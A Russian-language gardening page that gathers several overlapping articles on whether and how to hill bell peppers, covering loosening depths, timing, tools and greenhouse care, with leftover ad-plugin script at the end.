2 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Процесс окучивания перца

Процесс окучивания перца

Окучивание перца является одним из пунктов ухода за культурой. Существуют разные мнения насчет необходимости проведения этой процедуры.

Процесс окучивания перца

Описание процесса

Окучивание — это один из способов рыхления, после которого землю пригребают холмиком на основание стебля. Вспахивают только верхний слой почвы. Для многих огородных растений окучивание дает положительный результат. Это мероприятие благотворно влияет на корневую систему. Образуются новые корешки, вследствие чего культура становится более устойчивой и получает больше питания. Также растения имеют доступ к кислороду. В период сильных дождей слой грунта не вымывается.

Многие используют этот прием с целью профилактики болезней. Его полезно производить перед предстоящими заморозками или похолоданием. Это предупреждает вымерзание культуры.

Преимущества

Корневая система перца, так же, как и баклажанов, расположена в верхних слоях грунта — она является поверхностной. Если окучивать растения, можно добиться следующих результатов:

  • увеличивается доступ кислорода к корням;
  • активизируется рост и развитие культуры;
  • повышается биологическая функция содержащихся в почве микроорганизмов: они влияют на здоровье овощей, снижают риск развития патологий.

При окучивании всегда удаляют сорную траву, поэтому она не успевает навредить культуре.

Недостатки

При окучивании перца легко повредить его корни. Надо быть предельно осторожными, чтобы не задеть их. Также корневая система растения имеет шейку, поэтому оно не нуждается в развитии дополнительных корешков. Такая манипуляция способствует задержке влаги в почве. Растениям это грозит загниванием корней и ствола.

Когда производить окучивание

У такого растения придаточные корневые отпрыски образуются только на зеленом стебле. Процесс происходит до формирования семядольных листьев, поэтому эффективно окучивать в этот период: культура получает стимуляцию роста.

После высадки рассады не стоит производить окучивание

Не стоит производить этот агротехнический процесс, после того как стебель растения уже одеревенел. При отсыпке земли заглубляется корневая шейка. Овощи отрицательно реагируют на рыхление. Повышается риск повреждения корневой системы. Также не надо проводить окучивание после высадки рассады на постоянное место. Где-то до 2 недель культура приостанавливает развитие. В это время укрепляются корни.

Как окучивать

Если выбор сделан в пользу этой процедуры, ее совершают с предельной осторожностью. Чувствительная корневая система не должна быть затронута, иначе растение погибнет или сбросит завязи и цветки.

Рыхление производят мотыгой при образовании сухой корки, которую овощи не приемлют. Движения должны быть плавными. Перцы окучивают в 4 этапа:

  • спустя 1-2 сутки после второго полива землю заделывают на глубину менее 6-8 см;
  • во время цветения — не больше, чем на 10-12 см;
  • в период образования завязей — до 14-16 см;
  • когда начинается массовое плодоношение — на 6-8 см.

Глубину вспашки можно увеличить, если культуру выращивают на тяжелой земле. Таким действием добиваются прогревания и проветривания почвы.

Когда окучивают салатный перец, слегка рыхлят почву каждый раз после дождя. Во время совершения манипуляций удаляют сорняки. После нее мульчируют растения компостом или соломой.

Рыхление почвы при окучивании

Культура хорошо откликается на рыхление в междурядьях, независимо от того, где она выращивается: на незащищенном грунте или в теплицах. На протяжении вегетационного периода совершают до 5 таких процедур. Существуют определенные правила, которых надо придерживаться при вспашке земли:

  • глубина рыхления должна составлять 10-12 см во время цветения;
  • когда образуются завязи — не более 15 см;
  • в период плодоношения — до 20-25 см;
  • если расстояние между рядами небольшое, во время цветения землю не рыхлят.

Такие манипуляции помогают справляться также с сорной травой. Ее засыпают небольшим слоем почвы, под которым она гибнет. При выращивании культуры в тепличных условиях рыхление должно сопровождаться проветриваниями.

Можно ли окучивать перцы и как правильно это делать

Окучивание – это рыхление верхнего слоя почвы вокруг растения с нагребанием земли на стебли на высоту от 2 до 20 см. Это увеличивает доступ кислорода к корням, что положительно сказывается на росте корневой системы, а значит и всего растения. Невозможно представить, что какая-нибудь культура обходилась без окучивания, но в отношении перца у огородников мнения расходятся.

Нужно ли окучивать перец

Есть мнение, что окучивать перец нельзя. Корни растения находятся у поверхности земли и их можно легко повредить, тем самым погубив куст. Другие специалисты настаивают, что эта процедура необходима для снабжения корней кислородом. Это способствует росту новых корневых побегов, необходимых для питания и нормального развития.

Процедура помогает отращивать новые корни культурам с поверхностной корневой системой. И болгарский перец, по мнению многих, нуждается в этом. Вовремя проведенное окучивание перцев стимулирует развитие корневой системы, которая, будет эффективно кормить и поить куст.

  • ливни могут размывать землю вокруг растения и оголять корень;
  • в засушливую погоду образовывается земляная корка, которая препятствует доступу кислорода.

Окучивание полезно, тем что:

  • в почве поддерживается влажность;
  • одновременно удаляются сорняки;
  • лучше заделывается внесенная подкормка из удобрений;
  • способствует развитию необходимых почвенных микроорганизмов.

Но, окучивая перец, можно не рассчитать глубину рыхления и повредить корни, что приведет к гибели куста. Также, по мнению многих садоводов, если закрыть корневую шейку в тепличных условиях можно спровоцировать развитие гнили.

Технология окучивания

Окучивание перца необходимо, но вместе с этим несет определенные риски, поэтому процедуру нужно проводить аккуратно, не повреждая корни. И рекомендуют соблюдать следующую технологию:

  1. Не стоит производить окучивание в первые 2 недели после высадки, так как в это время корень укрепляется в земле.
  2. В первый раз окучивание проводят после второго полива через 1-2 суток. Рекомендуют рыхлить неглубоко, на глубину 5 см.
  3. Второе рыхление делают во время начала цветения, которое можно углубить до 10 см в глубину.
  4. В третий раз окучивают, когда кусты перца обильно цветут. Делать это можно глубже на уровень 8-10 см.
  5. Когда появились завязи плодов проводят еще одну процедуру до глубины 14-16 см.
  6. Когда перцовый куст начинает плодоносить глубину рыхления сокращают до 6-8 см.

После каждого полива и дождя необходимо неглубоко рыхлить почву и одновременно удалять сорняки. Многие огородники считают, что когда стебель перца одеревенел, то окучивание не имеет смысла.

При окучивании пользуются тяпкой, мотыгой или сапом с длинной ручкой, чтобы доставать почву с дальних концов грядки и ближайших междурядий. Процедуру проводят через 12 часов после полива. Рыхлить на глубину до 10 см и нагребать землю на стебли валиком не более 4 см.

Садоводы, отстаивающие позицию «за» окучивание перца в теплице и на открытых грядах, утверждают, что без этой технологии невозможно получить хороший урожай. Окученный куст перца:

  • получает доступ кислорода к корням, что положительно сказывается на росте и плодоношении;
  • улучшается симбиоз растения с микроорганизмами, обитающими в грунте.

Противники окучивания отстаивают свою позицию, тем что корневую систему можно повредить. Второй их аргумент, что у перца есть корневая шейка, от которой отрастают боковые корневые побеги и этого достаточно, чтобы стимулировать рост и плодоношение кустов.

Надо ли окучивать перцы в теплице

Открытый грунт отличается от тепличного. Перец в теплицах сажают в субстрат, приготовленный по своей технологии, где много органики и мульчи. И такая смесь хорошо пропускает воздух и воду. Некоторые огородники утверждают, что у растений, в таких условиях, не образуются новые корешки, для чего, в основном и проводится окучивание. Поэтому многие считают окучивать перец в теплицах не нужно.

Но, есть считающие, что рыхлить землю на небольшую глубину, нужно, так как это:

  • предупреждает многие заболевания;
  • насыщает землю кислородом.

Хорошо если теплица при этом и проветривается.

После окучивания перцев следует придерживаться обычного графика ухода за растением. Нужно следить за режимом полива и подкормки. Если стоит жаркая и сухая погода, то поливать нужно чаще. Если дождливо, то приостанавливают. В любом случае перец – влаголюбивая культура и нужно следить за тем как увлажнена почва. При умеренной погоде возможен следующий режим орошения:

  • до цветения 1 раз в неделю;
  • во время цветения и плодоношения 2-3 раза в неделю.

В итоге можно выделить пару главных мыслей:

  • не нужно рыхлить глубоко, чтобы не повредить корень;
  • не закрывать шейку корня;
  • соблюдать режим полива и подкормки.

Советы могут быть противоречащими, однако это не говорит о том, что информация неверная. Существуют разные климатические условия, они отличаются от самых холодных до теплых и очень жарких. Каждое мнение основано на своем опыте, на своей почве, в своем климате.

Решив заняться разведением болгарского перца, лучше проконсультироваться с бывалыми садоводами в вашей местности, изучить их опыт, посмотреть на плоды их труда. Кроме того, нет лучше советчика чем собственный опыт. Можно высадить несколько грядок и обрабатывать их по-разному, наблюдая за результатом. Достаточно поэкспериментировать пару лет, чтобы наработать свою технологию выращивания перца. И кто знает, может она станет лучшей.

Как правильно окучивать перцы в открытом грунте и теплице и нужно ли это делать

Перец – овощное растение семейства Пасленовые, родом из тропических районов Америки. Чтобы понять, нужно ли при выращивании окучивать перцы, следует изучить биологические особенности культуры. Также важно принимать во внимание свойства грунта на участке или в теплице. Важно, чтобы грунт пропускал воздух и поливную воду к корням. Итак, разберемся последовательно по каждому пункту.

Что представляет собой процедура

Окучивание – вид обработки почвы с нагребанием мягкой взрыхленной земли из междурядий на стебли растений слоем от 2-3 до 15-20 сантиметров. В связи с этим, различают мелкое и высокое окучивание. Главным звеном в процедуре является рыхление почвенной корки и разрушение капилляров в ней, чтобы предотвратить потерю влаги.

Растения положительно отзываются на рыхление. Мелкое окучивание показано на легких песчаных почвах, для всех культур без исключения. На тяжелых суглинках и глинистых почвах, солонцах и солончаках даже небольшое окучивание может серьезно сдерживать рост растений.

Современные технологии возделывания овощей с применением систем капельного орошения основываются на мульчировании верхнего слоя почвы темной полиэтиленовой пленкой.

При этом растения развиваются быстрее, влага не испаряется. Такую технологию можно применять как на больших площадях – в поле, так и на огороде, в приусадебном хозяйстве.

Надо ли окучивать перцы в открытом грунте?

На родине, в Южной Америке, перцы – это многолетние полукустарники с одревесневшим стеблем. Корневая система у этой культуры мочковатая, поверхностно расположенная. В природе она не развивается до значительных размеров, поскольку грунт в местах ее естественного расселения очень плодородный и всегда влажный.

Важно! Корни у перца располагаются близко к поверхности почвы, а стебель становится очень плотным, на нем не образуются придаточные корни.

Чтобы ответить на вопрос, нуждаются ли болгарские перцы в окучивании, нужно внимательно рассмотреть почву на участке и с особой тщательностью подойти к подготовке грядок для посадки полезного овоща. Тяжелый глинистый грунт разбавляют внесением песка, а в легкий добавляют глину. Во всех случаях обязательно внесение торфа, большого количества органики в виде компоста или перегноя. Так, на 1 квадратный метр грядки вносят 20-30 килограммов перегноя.

Польза окучивания перцев

Положительный эффект от проведения окучивания заключается в следующем:

  • в почве сохраняется влага;
  • увеличивается поступление кислорода к корням;
  • одновременно удаляются сорняки;
  • при внесении минеральных и органических удобрений выполняется их заделка;
  • активизируются полезные почвенные микроорганизмы;
  • в период возвратных весенних заморозков корни более защищены от повреждения;
  • в случае ураганного ветра растения будут устойчивы в почве.

Участок, на котором применяют рыхление и окучивание, выглядит более ухоженным, с высокой культурой агротехники.

Какой вред может нанести процедура

У перцев в наличии четкое разграничение между тканями корня и стебля. Его можно заметить по тонкому сочленению – это, так называемая, корневая шейка. У молодых растений, при нахождении корневой шейки в земле, наблюдается угнетение или полная остановка роста, при этом возможно загнивание корней, развитие заболеваний.

В момент пикировки или высадки рассады шейка должна находиться на уровне почвы или чуть выше.

Во все периоды роста при окучивании легко можно повредить поверхностные корни или даже подрубить стебли кустов при их частом расположении. Сложно проводить окучивания при узких междурядьях. Могут страдать другие культуры, более нуждающиеся в присыпании грунта, например, картофель, томаты, бахчевые культуры.

Если участок заражен сорными растениями, и их семена повсюду рассыпаются, окучивание провоцирует прорастание сорняков, и ситуация с засоренностью грядок усугубляется. При закапывании корнеотпрысковых сорняков они размножаются в геометрической прогрессии.

Обратите внимание! Окучивание молодых ростков может привести к остановке роста, гнили и механическому повреждению корней, стеблей, сильному засорению гряд.

Необходимость процедуры в теплицах

Для тепличных перцев грунт готовят особым образом: добавляют много органики, удобрений и мульчи. Субстрат выровнен по физико-механическим свойствам – он хорошо пропускает воду, воздух, удерживает тепло. В период роста и максимальной продуктивности растения получают достаточно влаги и питательных веществ. Они надежно защищены от капризов погоды – мороза и сильного ветра. В таких условиях в окучивании нет необходимости.

Технология окучивания

Операция проводится вручную или с использованием технических средств – мотокультиваторов, мини-тракторов, а на полях – тракторными агрегатами, в сцепке с культиваторными механизмами. Важным условием успешного проведения окучивания является достаточная ширина междурядья – 40-70 сантиметров.

Оптимальные сроки

Для перцев процедуру проводят в начальный период вегетации – примерно через 2 недели после высадки рассады в открытый грунт. За это время она успевает укорениться. Окучивание в более поздние сроки не приносит желаемого положительного эффекта, поскольку стебель становится деревянистым.

Правила проведения работ

При ручном окучивании желательно пользоваться мотыгой с длинным черенком. Это позволит брать почву с дальних концов грядки и соседних междурядий. Почва рыхлится на глубину 6-8 сантиметров и нагребается на стебли валиком, высотой не более 4 сантиметров. Если кусты посажены редко – можно нагрести грунт вокруг каждого стебля в отдельности. Сорняки следует убирать и по возможности избегать их закапывания.

Как ухаживать за посадками после окучивания

В период вступления растений в плодоношение главное – это продолжать их поливать в достаточном объеме, поскольку перец любит влагу. Так, на каждый квадратный метр грядки необходимо выливать 4-5 ведер воды. После полива полезно мульчирование торфом.

Перец отзывчив на листовые подкормки простыми или комплексными удобрениями. Чрезмерное увлечение органикой, например, полив куриным пометом приводит к тому, что кусты начинают жировать в ущерб плодоношению. При выращивании высокорослых сортов кусты подвязывают к кольям. Если налицо загущение, количество стеблей нормируют до двух-трех.

При выращивании перцев следует внимательно рассмотреть почвенные условия, учесть биологические особенности культуры, возможность погодных аномалий и принять решение в отношении проведения процедуры окучивания. В целом, положительных эффектов от проведения этой операции больше, чем возможных негативных последствий.

Можно ли окучивать перцы: как правильно это делать

Окучивание – вид обработки грунта с нагребанием рыхлой почвы из междурядий на стебли высотой 20-30, 150-200 мм. Перец – овощная растительная культура семейства Пасленовые, родом из американских тропиков. Чтобы понять, надо ли при выращивании его рыхлить, следует изучить биоособенности овоща. Необходимо обратить внимание на свойства почвы на участке или в тепличном помещении. Важно, чтобы земля пропускала воздух и воду к корневищу.

Польза окучивания

Окучивание может быть мелким и высоким. Главное звено в процессе – взрыхление корки и разрушение капилляров в ней, чтобы не допустить потерю влаги. Окучивать рассаду многие предпочитают из-за того, что такая мера:
  • защищает корни от негативного воздействия солнца;
  • способствует нарастанию новых корней у растений с поверхностным корневищем.

Окучивание стимулирует формирование свежих корешков, которые затем будут доставать для растительной культуры воду и полезные микроэлементы. В особенности полезна процедура для болгарского перца, выращиваемого на огороде, под открытым небом.

Возможные риски

Окучивание перца в теплице или в открытом грунте несет с собой определенные риски. Обрабатывая взрослую рассаду, огородник может повредить разросшиеся корни культуры инструментом. Закрывание почвой прикорневой шейки перца, чрезмерное поливание в парнике может спровоцировать гниение. Проблемы получится предотвратить, если соблюдать время и правила окучивания рассады. Советы профессионалов помогут увеличить количество урожая без вреда для ее стойкости к специфическим болезням.

Несмотря на все плюсы обработки, среди огородников нет точного ответа на вопрос, нужно ли окучивать перец. Дачники делятся на 2 лагеря:

  • одни считают, что перцовую рассаду окучивать не нужно;
  • другие не сомневаются в необходимости мероприятия.

Каждое мнение подкреплено аргументы, дающими возможность сделать вывод о том, в какой ситуации необходимо окучивать, а когда от обработки надо отказаться.

Определенная часть огородников утверждает, что окучивать – никчемная затея. Это связано с тем, что корневище располагается близко к поверхности грунта, в результате чего во время взрыхления ее легко можно травмировать. Еще один аргумент против: корни рассады имеют шейку, разрастание дополнительных корешков для выполнения питательной и фиксирующей рассаду в грунте функции болгарским перцам не нужно.

Но все очень, относительно. Вторая часть овощеводов убедилась на практике, что перец позитивно откликается на рыхление, поэтому они проводят такую уходовую процедуру регулярно. Это объясняется тем, что благодаря корням, расположенным близко к поверхности, во время взрыхления идет приток кислородных масс. Такое насыщение:

  • запускает рост и развитие рассады;
  • усиливает биологический функционал почвенных полезных микроорганизмов;
  • улучшает питание.

Технология окучивания

Болгарские перцы абсолютно не терпят корки на грунте, поэтому огородник должен следить за ее формированием и своевременно ликвидировать сухость. Однако окучивание перцев надо проводить очень осторожно, чтобы не задеть корешки. Для этого важно соблюдать технологию рыхления:

  1. Одна из особенностей перца – медленный рост в первые полторы-две недели после пересаживания. Что связано с укреплением корня. В это время выполнять рыхление противопоказано.
  2. Первый раз окучивать можно через сутки-двое после второго полива. Глубина взрыхления не должна быть больше 60-80 мм.
  3. В период массового цвета нужно выполнить еще одно окучивание. Рыхлить разрешается на глубину 80-100 мм.
  4. Третий раз окучивают во время формирования завязей перцев. Можно рыхлить на глубины 140-160 мм.
  5. В фазу массового плодоношения окучивать можно на глубину 60-80 мм. Если почва отличается тяжелой структурой, рыхлить нужно чуть глубже, чтобы обеспечить полноценный нагрев и проветривание грунта. Но делать это необходимо очень осторожно, чтобы не нанести вред корневой системе.

Кроме указанных случаев, поверхностное окучивание следует выполнять после каждого полива или природных осадков. В период обработки необходимо убирать сорную траву. Рассаду в теплице или на огороде можно окучивать только после формирования 4–5 настоящих листиков. После такого обрабатывания землю важно мульчировать компостом, укрыть соломой или другими материалами. При выращивании перцевой рассады на огороде рыхлить нужно и в междурядьях. Чтобы не навредить рассаде, важно соблюдать ряд рекомендаций:
  1. Междурядные окучивания в период массового цвета осуществляют на глубине 100-120 мм.
  2. Во время образования завязей окучивают на глубине 150 мм.
  3. В период массового плодоношения обрабатывают на глубине 220-250 мм.

Когда между рядами узко, не обрабатывают при массовом цветении. Широкие дорожки между рядами нельзя рыхлить после того, как перец достигнет высоты навески обрабатывающих мини-машин или тракторов современных моделей. В период вегетации необходимо 2-3 раза окучить растительную культуру с целью удаления сорной травы.

Для перцевой рассады окучивание выполняют в начале вегетационного периода – приблизительно через 14 дней после высаживания саженцев в открытый грунт. За это время она пустит крепкие корни.

При рыхлении правильно применять мотыгу на длинной ручке. Это даст возможность брать грунт с дальних концов огорода и соседних междурядий. Землю окучивают на глубину 60-80 мм и нагребают на стебли валиком, высотой не больше 40 мм. Если кусты высажены не часто – можно нагрести почву вокруг каждого растения отдельно. Сорную траву следует убирать и по возможности не прикапывать.

Если огородник выбирает окучивание, его проводят с предельной аккуратностью. Чувствительные корни не должны быть задеты, иначе перец погибнет или облетит. Окучивают специальным инструментом при формировании сухой корочки, которую перец не любит. Рыхлить надо плавно и поэтапно:

  1. Спустя 2 дня после второго полива почву заделывают на глубину меньше 60-80 мм.
  2. При цветении — не более, чем на 100-120 мм.
  3. Во время формирования завязей — до 140-160 мм.
  4. Когда формируются стручки — на 60-80 мм.

Когда рыхлят болгарский перец, слегка поднимают грунт каждый раз после дождя. Сразу убирают и сорную траву. После окучивания вносят мульчу.

Надо ли окучивать перцы в открытом грунте и теплице

Чтобы понять, нуждаются ли рассада в рыхлении, необходимо хорошо изучить субстрат на огороде и внимательно подойти к подготовке участка для высадки полезной овощной культуры. Тяжелый глинистый следует разбавить внесением песка, а в легкий включить глины. Во всех случаях обязательно добавления торфа, большого числа органических веществ в виде компостной массы или перегноя. Так, на 1 м² грядки разбрасывают 20-30 кг перегноя. Позитивный эффект от выполнения рыхления состоит в следующем:
  1. В грунте сохраняется влага.
  2. Повышается поступление кислорода к корневищу.
  3. Заодно убирают сорняки.
  4. При внесении минералов и органики осуществляют их заделку.
  5. Активизируют полезные микроорганизмы.
  6. Во время возвратных весенних морозов корневище будет под защитой от повреждения.
  7. В ситуации сильного ветра рассада выстоит в грунте. Огород, на котором окучивают перец, выглядит более ухоженным, с высокой агротехнической культурой.

Перец в теплице окучивать необязательно. Это связано с тем, что новые корни у высаженных культур не образуются, а именно это — основная задача рыхления. Однако так как перцы не переносят формирования корки на грунте, его важно взрыхлять на малую глубину. Такая мера станет профилактической, защитит от многих болезней, обогатит корни растительной культуры кислородом и исключит загнивание. Процедуру взрыхления грунта в теплице правильно совмещать с проветриванием.

Как ухаживать за посадками после окучивания

Во время начала вызревания перцев – нужно продолжать поливание в требуемом объеме, так как болгарский любит влагу. На каждый м² грядки нужно проливать 40-50 л воды. После поливания полезна торфяная мульча. Перец отзывчив на листовые удобрения простыми или комплексными составами. Чрезмерное увлечение органикой, например, подкормка птичьим пометом приводит к тому, что рассада наращивает зелень, в ущерб плодоношению. При выращивании высокорослых сортовых видов важно проводить подвязку к колышкам. Если налицо загущение, оставляют 2-3 стебля.

Процедура позитивно сказывается на многих растениях. Если по правилам окучивать перец, это приведет к активному росту и хорошему питанию овоща. Совмещая действие с другими уходовыми мероприятиями, можно собрать богатый урожай.

Нужно ли окучивать перцы в теплице и в открытом грунте, как делать

Окучиванием называется процесс разрыхления верхнего почвенного слоя, находящегося вблизи от культуры. Такой уход очень важен и полезен для большинства растений, поэтому дачники задаются вопросом: нужно ли окучивать перец?

Сам процесс окучивания дает возможность посадке правильно расти, способствует доступу кислороду к корневой системе, вследствие такого воздействия культура пускает новые корешки, необходимые для подпитки и устойчивости в грунте.

Окучивание блокирует процессы вымывания земельного слоя в период проливных дождей. Это отличная профилактика болезней, играет окучивание важную роль и перед похолоданием, заморозками, закаляя культуру, что способствует сведению к минимуму всех рисков вымерзания.

Аргументы «за» и «против»

Несмотря на все преимущества окучивания, среди дачников не существует определенного ответа на вопрос, надо ли выполнять эту процедуру по отношению к перцам. Огородники разделяются на две группы: одна утверждает, что перец окучивать нельзя, а вторая уверена, что эта процедура очень полезна для растения. Каждое мнение имеет четкую аргументацию, позволяющую сделать вывод о том, в какой ситуации нужно проводить окучивание, а в какой от этого стоит отказаться.

Большая часть дачников утверждает, что окучивание перцев — ненужная процедура. Такое мнение обусловлено тем, что корневая система располагается в области верхнего почвенного слоя, в результате чего в процессе рыхления ее легко можно повредить. Существует и еще один аргумент против окучивания: корневая система перцев имеет шейку, разрастание дополнительных корневых ответвлений для осуществления питательной и фиксирующей растение в почве функции перцам не требуется.

Продление срока задержки влажности почвы может привести к распространению гнилостных патологий на корневой системе, стволе.

Существует и противоположное мнение. Вторая часть огородников убедилась на собственном опыте, что перец положительно откликается на окучивание, поэтому овощеводы считают такую процедуру ухода за растением обязательной. Такая позиция обусловлена тем, что благодаря корневой системе, располагающейся в верхних почвенных слоях, во время рыхления осуществляется повышенный приток кислорода к ней. Такая кислородная обработка способствует активизации роста и развития культуры, усиливает биологическую функцию почвенных полезных микроорганизмов, улучшает осуществление питания.

Посмотрите также

Посадка и уход за рассадой перца на Урале в теплице и открытом грунте Читать

Технология окучивания

Перец совершенно не переносит почвенной корки, поэтому дачникам необходимо отслеживать моменты ее формирования и вовремя устранять сухость. Несмотря на пользу рыхления, дачники призывают окучивать перец очень аккуратно, чтобы не повредить корни.

Для этого необходимо знать правильную технологию:

  1. Стоит учесть, что одной из особенностей болгарского перца считается медленный рост в первые 10 – 14 суток после пересадки. Такая особенность обусловлена укреплением корневища. В этот период проводить окучивание не следует.
  2. Первое окучивание нужно выполнить спустя 24 – 48 часов после второго орошения. Глубина рыхления не должна превышать отметки в 6 – 8 сантиметров.
  3. Во время массового цветения необходимо провести еще одно рыхление. Это окучивание можно углубить до уровня 8 – 10 сантиметров.
  4. Третье окучивание перцев проводится в момент формирования завязей плодов. Может достигать глубины 14 – 16 сантиметров.
  5. В фазу массового плодоношения глубина рыхления должна быть снова сокращена до 6 – 8 сантиметров.

Если земля отличается тяжелой структурой, окучивание можно проводить немного глубже, чтобы обеспечить лучшее прогревание и проветривание почвенного слоя. Однако делать это следует очень аккуратно, чтобы не повредить сформированные корни.

Помимо указанных случаев, неглубокое рыхление следует проводить после каждого полива или дождя. Во время такой обработки почвы следует извлекать сорняки. Посаженное растение необходимо окучивать только после формирования 4 – 5 настоящих листочков. После такой обработки почву на грядке следует мульчировать компостным удобрением, укрывать соломой или иными подходящими материалами.

При выращивании перцев в открытом грунте рыхление следует проводить и в междурядьях. Чтобы не нанести вред растению, необходимо учитывать несколько рекомендаций:

  1. Междурядные обработки во время массового цветения производятся на глубине 10 – 12 сантиметров.
  2. В период формирования завязей рыхлить почву нужно не глубже 15 сантиметров.
  3. Во время массового плодоношения обработка производится на глубине 22 – 25 сантиметров.
  4. Если междурядья отличаются узостью, их необходимо прекратить обрабатывать во время массового цветения.
  5. Широкие междурядья не следует обрабатывать после того, как культура достигнет высоты навески обрабатывающих минимашин или тракторов современных моделей.
  6. Во время вегетационного периода необходимо 2 – 3 раза окучить растение с целью удаления сорняков.

Посмотрите также

Характеристика и описание сорта перца Ласточка, его урожайность Читать

Окучивание позволяет дачнику присыпать сорняковые всходы почвенным слоем в 5 – 6 сантиметров, под гнетом которого они погибают. В период вегетации возможно проведение 4 – 5 междурядных обработок.

Необходимость процедуры в теплицах

Нужно ли перцы окучивать, если культура посажена в тепличных конструкциях? Окучивание перца в теплице — процедура необязательная. Это обуславливается тем, что новые корешки у посаженных культур не формируются, а именно этот процесс — главная цель окучивания.

Но так как перцы не переносят формирования почвенной корки, землю следует регулярно рыхлить на небольшую глубину. Такая процедура станет отличной профилактикой многих заболеваний, насытит корневую систему растения кислородом и исключит формирование гнили на корнях и стеблях. Процедуру рыхления почвы в парнике лучше всего совмещать с проветриванием.

Положительные черты

Многие дачники убедились на своем опыте, что окученные таким способом перцы отличаются активизацией своего развития. Процедура имеет ряд иных преимуществ:

  • улучшение притока воздуха к корневой системе приводит к ускорению роста и развития растительной культуры;
  • производится косвенная стимуляция полезных почвенных микроорганизмов, благотворно влияющих на здоровье растения и снижающих риск появления распространенных патологий;
  • сведение риска формирования гнили на корневище или стволе растения;
  • подобное рыхление позволяет вовремя бороться с сорняками.

Отличительная черта роста болгарского перца в том, что культура хорошо формирует придаточные корневые отростки исключительно на зеленых стеблях и до формирования семядольных листьев. Окучивание в этот период только стимулирует процесс и помогает растительной культуре быстрее вырасти и развиться.

Когда перечные стебли уже одеревенели, растение отрицательным образом реагирует на заглубления корневой шейки и рыхление, осуществляющееся в глубоких слоях почвы. Это объясняется тем, что повышается риск нарушения целостности поверхностной корневой системы.

При соблюдении всех правил окучивания и рыхления посаженный перец будет положительным образом отзываться на процедуру. Чаще всего окучивание способствует ускорению роста перца, повышению урожайности в период массового плодоношения. Для этого необходимо аккуратно проводить обработку земли плавными движениями, не позволяющими повредить целостность корешков.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
